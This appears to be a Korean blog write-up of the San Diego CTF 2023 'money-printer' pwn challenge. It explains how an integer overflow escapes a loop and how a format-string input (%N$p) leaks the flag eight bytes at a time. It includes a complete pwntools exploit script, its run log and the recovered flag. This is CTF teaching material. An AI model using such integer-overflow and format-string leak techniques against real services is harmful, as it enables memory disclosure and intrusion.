728x90
San Diego CTF 2023 write up
Pwn - money-printer
A turtle without it's shell is a sad sight to see
SDCTF 2023
San Diego CTF 2023
ctf.sdc.tf
해당하는 nc 서버로 들어가서 실행해보면 아래와 같은 결과를 나온다.
문제 이름이 money_print인 만큼 돈을 주고 받는 시스템이다. 내가 20달러를 원하면 상대방이 갖고 있느 100달러에서 20달러를 빼서 나에게 준다. 이걸 0 dollar가 될 때까지 '반복'한다.
전에 풀었던 버퍼오버플로우 문제가 생각나서 굉장히 큰 수를 입력해봤다.
루프를 벗어나고 돈이 공기 중에서 돈이 프린트 되었다며, 관객(?)에게 할 말이 있냐고 물어본다.
int의 최대치인 2147483647을 넘어서게 되면 dollars가 음수가 된다. int의 최대값을 넘어간 만큼의 돈을 원하면 루프를 빠질 수 있다.
이것을 이용해서 flag를 찾으면 될 것 같다. 이 취약점을 사용하여 플래그를 8 바이트 누수합니다. 이것을 반복하여 플래그 전체를 얻는다.
[int 최대값을 넘어가는 수를 반복적으로 입력해주는 파이썬 코드]
#!/usr/bin/env python3
from pwn import *
flag = ''
i = 10
while True:
if len(sys.argv) == 1:
p = remote('money.sdc.tf', 1337) // nc turtle.sdc.tf 1337
else:
p = process('./money-printer')
money = 2147483648
payload = f'%{i}$p'
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
print(str(money))
p.sendline(str(money).encode())
data = p.recvuntil(b'?\n').rstrip().decode()
print(data)
print(payload)
p.sendline(payload.encode())
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
flag += p64(int(data.split(' ')[-1], 16)).decode()
if '}' in flag or '\x00' in flag:
flag = flag.rstrip('\x00')
break
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
data = p.recvuntil(b'\n').rstrip().decode()
print(data)
p.close()
i += 1
if '}' not in flag:
flag += '}'
print(flag)
[실행 결과]
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of C:\Users\a9034\.cache\.pwntools-cache-3.10\update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[*] A newer version of pwntools is available on pypi (4.8.0 --> 4.9.0).
Update with: $ pip install -U pwntools
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%10$p
wow you said: 0x34647b6674636473
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%11$p
wow you said: 0x665f7530795f6e6d
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%12$p
wow you said: 0x435f345f446e7530
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%13$p
wow you said: 0x304d345f597a3472
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%14$p
wow you said: 0x4d5f66305f374e75
that's truly fascinating!
[*] Closed connection to money.sdc.tf port 1337
[x] Opening connection to money.sdc.tf on port 1337
[x] Opening connection to money.sdc.tf on port 1337: Trying 35.234.169.229
[+] Opening connection to money.sdc.tf on port 1337: Done
I have 100 dollars, how many of them do you want?
2147483648
you can have -2147483648 dollars!
wow you've printed money out of thin air, you have 2147483648!!! Is there anything you would like to say to the audience?
%15$p
wow you said: 0x79336e30
sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}sdctf{d4mn_y0u_f0unD_4_Cr4zY_4M0uN7_0f_M0n3y}
'CTF' 카테고리의 다른 글
| [SEE CTF] Mics-NoCode (0) | 2023.06.21 |
|---|---|
| [SEE CTF] Crypto-BabyRC4 (0) | 2023.06.21 |
| [San Diego CTF] Forensics - Susan Album Party (0) | 2023.05.06 |
| [San Diego CTF] Crypto - Six Bites (0) | 2023.05.06 |
| 시저암호 (0) | 2023.05.06 |
